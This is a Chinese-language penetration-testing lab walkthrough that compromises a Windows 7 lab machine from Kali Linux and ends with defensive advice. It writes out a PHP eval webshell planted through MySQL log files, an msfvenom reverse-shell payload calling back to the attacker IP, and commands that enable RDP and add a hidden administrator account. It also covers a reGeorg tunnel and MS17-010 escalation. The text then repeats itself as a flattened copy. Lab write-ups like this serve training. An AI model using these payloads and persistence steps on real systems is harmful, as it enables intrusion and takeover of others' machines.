渗透测试实战教学：从信息收集到系统提权

实验环境

靶机: Windows 7 (IP: 192.168.42.128)
攻击机: Kali Linux 2020 (IP: 192.168.42.129)

0x01 信息收集阶段

1.1 端口扫描

使用Nmap进行服务版本探测扫描：

nmap -sV 192.168.42.128

1.2 Web服务枚举

发现开放80端口，进行Web目录枚举：

发现phpinfo.php文件
发现phpMyAdmin管理界面

访问phpinfo.php获取重要信息：

Web根目录位置
PHP配置信息
服务器环境信息

1.3 phpMyAdmin弱口令攻击

尝试使用默认凭证登录：

用户名: root
密码: root
成功进入phpMyAdmin后台，获取以下信息：
MySQL版本信息
Apache服务器配置信息

0x02 通过phpMyAdmin日志文件getshell

2.1 检查写入权限

SHOW VARIABLES LIKE 'secure_file_priv';

若返回值为NULL，表示MySQL不允许导入导出文件。

2.2 配置日志文件

查看当前日志状态：

SHOW VARIABLES LIKE '%general_log%';

开启日志并修改日志路径：

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = 'C:/phpStudy/WWW/log.php';

通过SQL语句写入一句话木马：

SELECT '<?php @eval($_POST["obse"]);?>';

验证木马是否可用：
访问http://192.168.42.128/log.php并使用中国蚁剑连接。

0x03 利用Yxcms进行getshell

3.1 识别CMS

发现目标系统使用Yxcms内容管理系统。

3.2 获取后台密码

通过phpMyAdmin查看管理员表获取密码哈希
尝试MD5解密（失败）
尝试默认密码123456成功登录

3.3 插入木马文件

通过前台模板编辑功能插入PHP木马
注意Yxcms目录结构：
- protected/
- public/
定位木马文件位置

0x04 后渗透操作

4.1 建立稳定会话

使用中国蚁剑连接Webshell
生成Meterpreter payload：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.42.129 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > 123.exe

上传并执行payload获取Meterpreter会话

4.2 开启RDP服务

检查3389端口状态：

netstat -ano

通过注册表开启RDP：

echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDPTcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg

添加管理员用户：

net user obse Password@007 /add
net localgroup administrators obse /add

4.3 使用reGeorg建立Socks代理

上传tunnel.php到Web目录
启动reGeorg代理：

python2 reGeorgSocksProxy.py -l 0.0.0.0 -p 2333 -u http://192.168.42.128/yxcms/protected/apps/default/view/default/tunnel.php

配置Proxifier：
- 添加Socks5代理
- 设置代理规则仅应用于mstsc.exe

4.4 权限提升

尝试BypassUAC提权（失败）
使用系统漏洞提权：
- 收集系统信息：
```
systeminfo
```
- 使用在线工具分析可利用漏洞：
  提权辅助页面
- 发现MS17-010(EternalBlue)漏洞可利用
利用MS17-010提权成功，获取SYSTEM权限

关键点总结

信息收集：全面扫描和枚举是渗透成功的基础
多途径攻击：同时尝试多种攻击路径提高成功率
日志文件利用：当无法直接导出文件时，日志文件是getshell的有效方法
CMS利用：已知CMS的默认凭证和漏洞是重要突破口
权限维持：建立多种会话方式确保访问不中断
横向移动：使用代理工具绕过网络限制
权限提升：系统漏洞是利用的最后关键步骤

防御建议

禁用phpMyAdmin的root账户或使用强密码
限制MySQL的文件操作权限
及时更新CMS系统和修补已知漏洞
禁用不必要的服务如RDP或严格限制访问
定期更新操作系统补丁
实施最小权限原则
监控异常日志和网络流量

渗透测试实战教学：从信息收集到系统提权实验环境靶机 : Windows 7 (IP: 192.168.42.128) 攻击机 : Kali Linux 2020 (IP: 192.168.42.129) 0x01 信息收集阶段 1.1 端口扫描使用Nmap进行服务版本探测扫描： 1.2 Web服务枚举发现开放80端口，进行Web目录枚举：发现 phpinfo.php 文件发现 phpMyAdmin 管理界面访问 phpinfo.php 获取重要信息： Web根目录位置 PHP配置信息服务器环境信息 1.3 phpMyAdmin弱口令攻击尝试使用默认凭证登录：用户名: root 密码: root 成功进入phpMyAdmin后台，获取以下信息： MySQL版本信息 Apache服务器配置信息 0x02 通过phpMyAdmin日志文件getshell 2.1 检查写入权限若返回值为 NULL ，表示MySQL不允许导入导出文件。 2.2 配置日志文件查看当前日志状态：开启日志并修改日志路径：通过SQL语句写入一句话木马：验证木马是否可用：访问 http://192.168.42.128/log.php 并使用中国蚁剑连接。 0x03 利用Yxcms进行getshell 3.1 识别CMS 发现目标系统使用Yxcms内容管理系统。 3.2 获取后台密码通过phpMyAdmin查看管理员表获取密码哈希尝试MD5解密（失败）尝试默认密码 123456 成功登录 3.3 插入木马文件通过前台模板编辑功能插入PHP木马注意Yxcms目录结构： protected/ public/ 定位木马文件位置 0x04 后渗透操作 4.1 建立稳定会话使用中国蚁剑连接Webshell 生成Meterpreter payload：上传并执行payload获取Meterpreter会话 4.2 开启RDP服务检查3389端口状态：通过注册表开启RDP：添加管理员用户： 4.3 使用reGeorg建立Socks代理上传 tunnel.php 到Web目录启动reGeorg代理：配置Proxifier：添加Socks5代理设置代理规则仅应用于 mstsc.exe 4.4 权限提升尝试BypassUAC提权（失败）使用系统漏洞提权：收集系统信息：使用在线工具分析可利用漏洞：提权辅助页面发现MS17-010(EternalBlue)漏洞可利用利用MS17-010提权成功，获取SYSTEM权限关键点总结信息收集：全面扫描和枚举是渗透成功的基础多途径攻击：同时尝试多种攻击路径提高成功率日志文件利用：当无法直接导出文件时，日志文件是getshell的有效方法 CMS利用：已知CMS的默认凭证和漏洞是重要突破口权限维持：建立多种会话方式确保访问不中断横向移动：使用代理工具绕过网络限制权限提升：系统漏洞是利用的最后关键步骤防御建议禁用phpMyAdmin的root账户或使用强密码限制MySQL的文件操作权限及时更新CMS系统和修补已知漏洞禁用不必要的服务如RDP或严格限制访问定期更新操作系统补丁实施最小权限原则监控异常日志和网络流量